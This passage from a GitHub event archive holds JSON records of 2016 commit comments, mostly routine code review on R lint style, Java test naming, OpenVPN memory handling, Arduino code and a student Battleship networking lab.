^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n"}},"created_at":"2016-09-18T19:02:07Z"}
{"id":"4580437826","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071864,"position":27,"line":27,"path":"src/test/java/xigua/battle/of/elements/logic/battle/MagicFactoryTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:05:08Z","updated_at":"2016-09-18T19:05:08Z","body":"命名的规则为`被测试的内容_期待的结果`，这里下划线后面的部分属于测试的内容。`buildWithNoMoreThanThreeElements_ReturnEmptyMagic`，这样可能会好一些。"}},"created_at":"2016-09-18T19:05:08Z"}
{"id":"4580438449","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071867,"position":10,"line":191,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"e7bc8d899d5f4a539528e7919118ca216132da1a","created_at":"2016-09-18T19:05:33Z","updated_at":"2016-09-18T19:05:33Z","body":"@aunpyz  อันนี้กุลบคอมเม้นท์แล้วแก้กลับคืนให้ละ"}},"created_at":"2016-09-18T19:05:33Z"}
{"id":"4580438644","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071868,"position":34,"line":34,"path":"src/test/java/xigua/battle/of/elements/logic/battle/MagicFactoryTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:05:42Z","updated_at":"2016-09-18T19:05:42Z","body":"这里的问题同上。"}},"created_at":"2016-09-18T19:05:42Z"}
{"id":"4580441600","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071874,"position":56,"line":191,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"646850c78e4b3d74896eb994f785ec5b90564899","created_at":"2016-09-18T19:07:51Z","updated_at":"2016-09-18T19:07:51Z","body":"@aunpyz แก้คืนละ ดู commit ใหม่"}},"created_at":"2016-09-18T19:07:51Z"}
{"id":"4580441710","type":"CommitCommentEvent","actor":{"login":"fnuecke"},"repo":{"name":"MightyPirates/OpenComputers"},"payload":{"comment":{"id":19071875,"position":null,"line":null,"path":null,"commit_id":"884842b84378e9d15bb7d99c282e27b072434c4b","created_at":"2016-09-18T19:07:55Z","updated_at":"2016-09-18T19:07:55Z","body":"Possibly, but if so then yeah, should've been more like < 0.375 or so I think. Eh. Who cares about borders when shooting arrows at screens anyway."}},"created_at":"2016-09-18T19:07:55Z"}
{"id":"4580443079","type":"CommitCommentEvent","actor":{"login":"gupta-shantanu"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19071882,"position":30,"line":182,"path":"geocodertest.py","commit_id":"e58dc8da454668cce1ca10311328d366afacb01b","created_at":"2016-09-18T19:08:40Z","updated_at":"2016-09-18T19:08:40Z","body":"@rohitmanglik are you referring to this part?\r\nit executes when exception is thrown while getting place info."}},"created_at":"2016-09-18T19:08:40Z"}
{"id":"4580443331","type":"CommitCommentEvent","actor":{"login":"m1a9l9t7e"},"repo":{"name":"Machplatzwennduunsaufderstrassesiehst/Mental"},"payload":{"comment":{"id":19071883,"position":null,"line":null,"path":null,"commit_id":"5c7a453811015cc45fddd339168a46773418487f","created_at":"2016-09-18T19:08:53Z","updated_at":"2016-09-18T19:08:53Z","body":"or nah :DD, jo warum nicht. Ich mache das dann gleich mal."}},"created_at":"2016-09-18T19:08:53Z"}
{"id":"4580444088","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071886,"position":18,"line":18,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:09:26Z","updated_at":"2016-09-18T19:09:26Z","body":"下划线的后半部分，改成`HasCorrectSizeLimit`可能会好一些。"}},"created_at":"2016-09-18T19:09:26Z"}
{"id":"4580444692","type":"CommitCommentEvent","actor":{"login":"aunpyz"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071888,"position":10,"line":191,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"e7bc8d899d5f4a539528e7919118ca216132da1a","created_at":"2016-09-18T19:09:51Z","updated_at":"2016-09-18T19:09:51Z","body":"@kandation คือมึงจะใช้อันไหนก็ได้แหละ"}},"created_at":"2016-09-18T19:09:51Z"}
{"id":"4580445550","type":"CommitCommentEvent","actor":{"login":"ameynaik"},"repo":{"name":"ameynaik/Algorithms-Design-and-Analysis"},"payload":{"comment":{"id":19071889,"position":4,"line":27,"path":"pa1/merge_sort.py","commit_id":"372a0622d41c2901fca6ba813caf7c68a30f703e","created_at":"2016-09-18T19:10:26Z","updated_at":"2016-09-18T19:10:26Z","body":"safe"}},"created_at":"2016-09-18T19:10:26Z"}
{"id":"4580446168","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071891,"position":33,"line":33,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:10:51Z","updated_at":"2016-09-18T19:10:51Z","body":"这里的`elementList`仅仅是供子类使用，在测试类中调用`protected`的成员欠妥。"}},"created_at":"2016-09-18T19:10:51Z"}
{"id":"4580446169","type":"CommitCommentEvent","actor":{"login":"selvanair"},"repo":{"name":"ValdikSS/openvpn-with-patches"},"payload":{"comment":{"id":19071892,"position":19,"line":6683,"path":"src/openvpn/options.c","commit_id":"3d9e613b090212ea41a94ed11c44e4e94b1e3306","created_at":"2016-09-18T19:10:51Z","updated_at":"2016-09-18T19:10:51Z","body":"Looks ok except that its fine to just free the temp_cipher string here (no need for a temp_cipher_orig). Similar code in ssl.c is not a good example to emulate ;) Note that strtok only changes the contents of the string, the string pointer temp_cipher remains intact and can be freed."}},"created_at":"2016-09-18T19:10:51Z"}
{"id":"4580446587","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071894,"position":14,"line":14,"path":"src/test/java/xigua/battle/of/elements/logic/battle/MagicFactoryTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:11:07Z","updated_at":"2016-09-18T19:11:07Z","body":"Fixed."}},"created_at":"2016-09-18T19:11:07Z"}
{"id":"4580447050","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071897,"position":51,"line":51,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:11:25Z","updated_at":"2016-09-18T19:11:25Z","body":"问题同上。"}},"created_at":"2016-09-18T19:11:25Z"}
{"id":"4580447057","type":"CommitCommentEvent","actor":{"login":"kandation"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071896,"position":10,"line":191,"path":"hw3/src/hw3/SinglyLinkedList.java","commit_id":"e7bc8d899d5f4a539528e7919118ca216132da1a","created_at":"2016-09-18T19:11:25Z","updated_at":"2016-09-18T19:11:25Z","body":"@aunpyz  กุเสียว พวกเคสดักควาย ใส่ -1 มา ฉะนั้น ให้ตั้งตัวตั้งต้น ด้วยค่าแรก ก็น่าจะดีแล้ว"}},"created_at":"2016-09-18T19:11:25Z"}
{"id":"4580447060","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071898,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-18T19:11:26Z","updated_at":"2016-09-18T19:11:26Z","body":"yea its on same line at least but hovered still one pubic hair wider, lol and you recon you ocd is bad? :D"}},"created_at":"2016-09-18T19:11:26Z"}
{"id":"4580447353","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071899,"position":47,"line":47,"path":"src/test/java/xigua/battle/of/elements/logic/battle/MagicFactoryTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:11:37Z","updated_at":"2016-09-18T19:11:37Z","body":"问题同上。"}},"created_at":"2016-09-18T19:11:37Z"}
{"id":"4580447434","type":"CommitCommentEvent","actor":{"login":"stanleyrya"},"repo":{"name":"Slack-ZooMass/songgen-iOS"},"payload":{"comment":{"id":19071900,"position":null,"line":null,"path":null,"commit_id":"95f549a5a38c3061574eb83bf32b40b56c5db605","created_at":"2016-09-18T19:11:41Z","updated_at":"2016-09-18T19:11:41Z","body":"I'm so happy you are still working on this.\r\n\r\nI'll see if I have any time later this week to work on the server side."}},"created_at":"2016-09-18T19:11:41Z"}
{"id":"4580448184","type":"CommitCommentEvent","actor":{"login":"lidenstefan"},"repo":{"name":"lidenstefan/Android"},"payload":{"comment":{"id":19071901,"position":null,"line":null,"path":null,"commit_id":"3604d13db4860c7fa1f5212cceaed91a2a0ea331","created_at":"2016-09-18T19:12:09Z","updated_at":"2016-09-18T19:12:09Z","body":"asd"}},"created_at":"2016-09-18T19:12:09Z"}
{"id":"4580448350","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071902,"position":27,"line":27,"path":"src/test/java/xigua/battle/of/elements/logic/battle/MagicFactoryTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:12:16Z","updated_at":"2016-09-18T19:12:16Z","body":"Fixed."}},"created_at":"2016-09-18T19:12:16Z"}
{"id":"4580448368","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071903,"position":30,"line":30,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:12:17Z","updated_at":"2016-09-18T19:12:17Z","body":"命名问题。"}},"created_at":"2016-09-18T19:12:17Z"}
{"id":"4580448647","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071904,"position":37,"line":37,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:12:28Z","updated_at":"2016-09-18T19:12:28Z","body":"命名问题。"}},"created_at":"2016-09-18T19:12:28Z"}
{"id":"4580448845","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071906,"position":47,"line":47,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:12:36Z","updated_at":"2016-09-18T19:12:36Z","body":"命名问题。"}},"created_at":"2016-09-18T19:12:36Z"}
{"id":"4580448949","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071907,"position":18,"line":18,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:12:40Z","updated_at":"2016-09-18T19:12:40Z","body":"Fixed."}},"created_at":"2016-09-18T19:12:40Z"}
{"id":"4580448977","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071908,"position":55,"line":55,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:12:41Z","updated_at":"2016-09-18T19:12:41Z","body":"命名问题。"}},"created_at":"2016-09-18T19:12:41Z"}
{"id":"4580449129","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071911,"position":62,"line":62,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:12:48Z","updated_at":"2016-09-18T19:12:48Z","body":"命名问题。"}},"created_at":"2016-09-18T19:12:48Z"}
{"id":"4580449175","type":"CommitCommentEvent","actor":{"login":"berbb"},"repo":{"name":"NentoR/LeagueSharp"},"payload":{"comment":{"id":19071912,"position":null,"line":null,"path":null,"commit_id":"e20a3e9bdc702872ab7db879e4456d885601e2d3","created_at":"2016-09-18T19:12:50Z","updated_at":"2016-09-18T19:12:50Z","body":"https://www.elobuddy.net/topic/41017-azir-exploit/?do=findComment&comment=286507\r\n\r\n👍 "}},"created_at":"2016-09-18T19:12:50Z"}
{"id":"4580450178","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071916,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-18T19:13:32Z","updated_at":"2016-09-18T19:13:32Z","body":"I don't think I've ever measured a pubic hair LOL; but yes, it is frustrating."}},"created_at":"2016-09-18T19:13:32Z"}
{"id":"4580452923","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19071923,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-18T19:15:19Z","updated_at":"2016-09-18T19:15:19Z","body":"So... Before people start to ask, complain and bother me... It's FAQ time...! ☺️\r\n\r\nQ did you change device? \r\nA yes, now I'm on Xiaomi mi5\r\n\r\nQ this means that you will drop jflte devices? \r\nA absolutely NO, but my test device is dead, and my daily device after 3 years is slowly dying, now I can work on mi5 and use my old s4 for testing... And hopefully make jflte owners happy with a fully working N release...! \r\n\r\nQ will you release an MM rom for mi5? \r\nA unfortunately no, it's not I'm my plan... Here's the situation: everything works like a charm, except for network selection and mobile data/wifi switch (often requires  a reboot or mobile data won't work)... I made this rom only for my personal usage because I hate Miui and Xiaomi from the deep of my heart (locked bootloader, lack of opensource software for the unlocking, kernel sources not released for months, etc), i can use it because I barely switch between mobile data and wifi, but honestly this is not a daily usage for everyone, and I will focus on N, I think it's a dumb idea lose time work on MM when N is out"}},"created_at":"2016-09-18T19:15:19Z"}
{"id":"4580453048","type":"CommitCommentEvent","actor":{"login":"aunpyz"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":19071924,"position":null,"line":null,"path":null,"commit_id":"e7bc8d899d5f4a539528e7919118ca216132da1a","created_at":"2016-09-18T19:15:24Z","updated_at":"2016-09-18T19:15:24Z","body":"blame??"}},"created_at":"2016-09-18T19:15:24Z"}
{"id":"4580453121","type":"CommitCommentEvent","actor":{"login":"ftyers"},"repo":{"name":"UniversalDependencies/docs"},"payload":{"comment":{"id":19071925,"position":57,"line":143,"path":"_2016-09-05--06-prague/copula.md","commit_id":"d06801d62f55aedec8ed38766894cf93ca650087","created_at":"2016-09-18T19:15:27Z","updated_at":"2016-09-18T19:15:27Z","body":"I was thinking something similar (see below), but I'm not sure if it is worth the extra effort.\r\n\r\n> I've been thinking that perhaps what we need here is some way of referring to the external and internal subjects,[1] something like:\r\n> \r\n> The problem is that she is not happy\r\n> root(happy)\r\n> nsubj:cop(happy, she)\r\n> xnsubj:cop(happy, problem)\r\n> \r\n> So the xnsubj would be the subject of the entire clause on the other side of the copula, not just the main predicate:\r\n> \r\n> To be free is to be capable of thinking one's own thoughts .\r\n> root(capable)\r\n> xnsubj:cop(capable, free)\r\n> cop(free, be-1)\r\n> cop(capable, be-2)\r\n> \r\n> The main thing is that the device works .\r\n> root(works)\r\n> nsubj(works, thing)\r\n> xnsubj:cop(works, thing)\r\n> \r\n> Potentiality is what a thing is capable of doing .\r\n> root(capable)\r\n> nsubj:cop(capable, thing)\r\n> xnsubj:cop(capable, Potentiality)\r\n> \r\n> The corollary would be with xcsubj:cop,\r\n> \r\n> Your having been \" slightly drunk \" was the real problem .\r\n> root(problem)\r\n> cop(problem, was)\r\n> xcsubj:cop(problem, drunk)\r\n> cop(drunk, been)\r\n> aux(drunk, having)\r\n> nsubj:cop(drunk, Your)\r\n"}},"created_at":"2016-09-18T19:15:27Z"}
{"id":"4580455213","type":"CommitCommentEvent","actor":{"login":"237444405"},"repo":{"name":"237444405/xiedong"},"payload":{"comment":{"id":19071928,"position":null,"line":null,"path":null,"commit_id":"42600dc778a49b84941577e342f0dc6c0e1df140","created_at":"2016-09-18T19:16:50Z","updated_at":"2016-09-18T19:16:50Z","body":"@"}},"created_at":"2016-09-18T19:16:50Z"}
{"id":"4580455763","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"jelhan/croodle"},"payload":{"comment":{"id":19071929,"position":5,"line":8,"path":"app/locales/es/translations.js","commit_id":"ed87a86c2c966e7a5505c117ad8c1b8149aed0b3","created_at":"2016-09-18T19:17:11Z","updated_at":"2016-09-18T19:17:11Z","body":"Why reset this?\r\nI think it should be `texto libre`.\r\n\r\n[source](https://dict.leo.org/forum/viewUnsolvedquery.php?idThread=948383&idForum=19&lang=de&lp=esde)"}},"created_at":"2016-09-18T19:17:11Z"}
{"id":"4580456025","type":"CommitCommentEvent","actor":{"login":"smeroni68"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19071931,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-18T19:17:23Z","updated_at":"2016-09-18T19:17:23Z","body":"Thanks my friend..."}},"created_at":"2016-09-18T19:17:23Z"}
{"id":"4580457139","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19071933,"position":83,"line":83,"path":"src/test/java/xigua/battle/of/elements/model/battle/SummonedElementBankTest.java","commit_id":"52487da724a924fb3d12916d7bfafcf338281b18","created_at":"2016-09-18T19:18:05Z","updated_at":"2016-09-18T19:18:05Z","body":"所有的测试方法内几乎都调用了这个私有方法，可以考虑写到`setUp`中。"}},"created_at":"2016-09-18T19:18:05Z"}
{"id":"4580457372","type":"CommitCommentEvent","actor":{"login":"hansemannn"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19071935,"position":56,"line":1911,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T19:18:12Z","updated_at":"2016-09-18T19:18:12Z","body":"Not sure what you mean here. Tried to do it pretty much the same as you did with the team-id"}},"created_at":"2016-09-18T19:18:12Z"}
{"id":"4580458671","type":"CommitCommentEvent","actor":{"login":"SGolenzovskiy"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19071941,"position":27,"line":135,"path":"app/Project.php","commit_id":"7998ae6ef08ce6cebc2a2953ae068100583cb018","created_at":"2016-09-18T19:19:07Z","updated_at":"2016-09-18T19:19:07Z","body":"@sintsov Второй аргумент в нашем случае не срабатывает из-за umask сервера.\r\nИнтернеты рекомендуют делать последовательно mkdir, chmod."}},"created_at":"2016-09-18T19:19:07Z"}
{"id":"4580459080","type":"CommitCommentEvent","actor":{"login":"hansemannn"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19071943,"position":31,"line":1886,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T19:19:26Z","updated_at":"2016-09-18T19:19:26Z","body":"I had problems getting `this.provisioningProfileUUID` in the method at this point."}},"created_at":"2016-09-18T19:19:26Z"}
{"id":"4580461129","type":"CommitCommentEvent","actor":{"login":"luizperes"},"repo":{"name":"brain-labs/brainduino"},"payload":{"comment":{"id":19071946,"position":33,"line":68,"path":"Brainduino/Brain.cpp","commit_id":"45c1c098316ded46767af821ed3c688851a0d04b","created_at":"2016-09-18T19:20:43Z","updated_at":"2016-09-18T19:20:43Z","body":"I changed here again, now we only have one string and we are always returning an error code! I'm using `char array` instead of `string` because strings are very costly on Arduino!"}},"created_at":"2016-09-18T19:20:43Z"}
{"id":"4580461452","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19071948,"position":null,"line":null,"path":null,"commit_id":"cc3743210be6fdb755f4b0236e5d92a2f3f72550","created_at":"2016-09-18T19:20:55Z","updated_at":"2016-09-18T19:20:55Z","body":"@jar3817 Can you please revert / fix this one?"}},"created_at":"2016-09-18T19:20:55Z"}
{"id":"4580462700","type":"CommitCommentEvent","actor":{"login":"luizperes"},"repo":{"name":"brain-labs/brainduino"},"payload":{"comment":{"id":19071949,"position":6,"line":44,"path":"Brainduino/Brain.cpp","commit_id":"45c1c098316ded46767af821ed3c688851a0d04b","created_at":"2016-09-18T19:21:46Z","updated_at":"2016-09-18T19:21:46Z","body":"this method was divided into two ones for the sake of saving stack frames (= saving memory)! :D"}},"created_at":"2016-09-18T19:21:46Z"}
{"id":"4580464383","type":"CommitCommentEvent","actor":{"login":"luizperes"},"repo":{"name":"brain-labs/brainduino"},"payload":{"comment":{"id":19071951,"position":43,"line":87,"path":"Brainduino/Brain.cpp","commit_id":"45c1c098316ded46767af821ed3c688851a0d04b","created_at":"2016-09-18T19:22:55Z","updated_at":"2016-09-18T19:22:55Z","body":"I also changed here! We need smalled strings! :)"}},"created_at":"2016-09-18T19:22:55Z"}
{"id":"4580465315","type":"CommitCommentEvent","actor":{"login":"anantharam"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19071955,"position":null,"line":null,"path":null,"commit_id":"7faa88091bb4454c83cbd31688ee662f8d354e3e","created_at":"2016-09-18T19:23:36Z","updated_at":"2016-09-18T19:23:36Z","body":"@shashwat-vik : Have you comparedthe actual dialect that was generated and the csv.excel dialect?\r\nIdeally this shouldn't affect anything else if the Dialect properties dilimiter, escape chars, e.t.c are set correctly, but it doesn't hurt to double check that..."}},"created_at":"2016-09-18T19:23:36Z"}
{"id":"4580467327","type":"CommitCommentEvent","actor":{"login":"Emmanuel-Armstrong"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19071958,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T19:24:53Z","updated_at":"2016-09-18T19:24:53Z","body":"Oh crap I just realized, I've done some work on the file reading and\nwriting but I totally forgot to push it up to git! I'll see if I have any\nmore than you and if so I'll push up what I have when I get home from work\nin a couple hours.  Sorry about that!\n\nOn Sep 18, 2016 12:53 PM, \"dssquared\" <notifications@github.com> wrote:\n\n> I've started working with reading in the board file and filling the array,\n> about half success now. Once the board array is filled we can start working\n> on the rest. Not sure if we want to make a nother text file for the client\n> to keep track of the board since the client is re-invoked each time. Can't\n> really use an array since the program is restarted each time but writing to\n> a file from an array could be a pain. I will finish the server side\n> creating the board array first, might use a list within a list.\n> What do you guys want to work on or feel comfortable about working on?\n>\n> David\n>\n> On Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n> > Just checked, the address for localhost is correct, the port numbers and\n> > ip being set from command line arguments is already implemented and I\n> > checked the connection already. I was going to play around with different\n> > ways of making the board and http stuff next. I put a board.txt file in\n> the\n> > folder too to use to test reading the file and creating an array or list\n> of\n> > lists for the board.\n> > Remember to git pull before working on anything to make sure you have the\n> > most recent version.\n> > I will be working on it some tonight and spending most the day on it\n> > tomorrow.\n> >\n> > On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <dpschwehr@gmail.com>\n> > wrote:\n> >\n> >> Right now the server is on 127.0.0.1( i may have the address wrong but\n> it\n> >> should be the address of localhost, which is the same no matter what\n> >> machine it is running on) just to run it on your local machine to test,\n> it\n> >> will be changed to the ip address of the machine it is running on when\n> they\n> >> grade it.\n> >>\n> >> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <dpschwehr@gmail.com>\n> >> wrote:\n> >>\n> >>> It is getting the fire commands from the command line arguments, that\n> is\n> >>> why the client is being invoked every play. The connection is made\n> with the\n> >>> port number and IP address passed in from the command line arguments. I\n> >>> have already wrote the code for the connection using the socket\n> library.\n> >>> Thev ariables for the x and y coords passed from the command line are\n> >>> working just as you had them in your test.py, I added it to the\n> client.py\n> >>> file already. These variable will be used in the methods that send the\n> http\n> >>> message. The http and passing in the variable I think will be the easy\n> >>> part, some of it is done and it works. The time consuming part is\n> going to\n> >>> be writing the code to maintain the board and \"serving\" the display of\n> the\n> >>> board.\n> >>> Tracking sunk ships will work as you suggested and this will be put in\n> a\n> >>> method called from read_board or process_reply or done inside of\n> >>> process_reply.\n> >>>\n> >>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n> >>> notifications@github.com> wrote:\n> >>>\n> >>>> I was thinking about tracking sunk ships. Just a thought, but what if\n> >>>> we had a global variable for each ship (carrier = 5), and every time\n> we hit\n> >>>> that type of ship we decrement that value, and compare it to 0. so if\n> >>>> carrier gets to 0 then it has been hit 5 times which is the same\n> thing as\n> >>>> being sunk.\n> >>>>\n> >>>> —\n> >>>> You are receiving this because you authored the thread.\n> >>>> Reply to this email directly, view it on GitHub\n> >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n> 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n> >>>> or mute the thread\n> >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6gkDXIV5_\n> YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n> >>>> .\n> >>>>\n> >>>\n> >>>\n> >>\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> 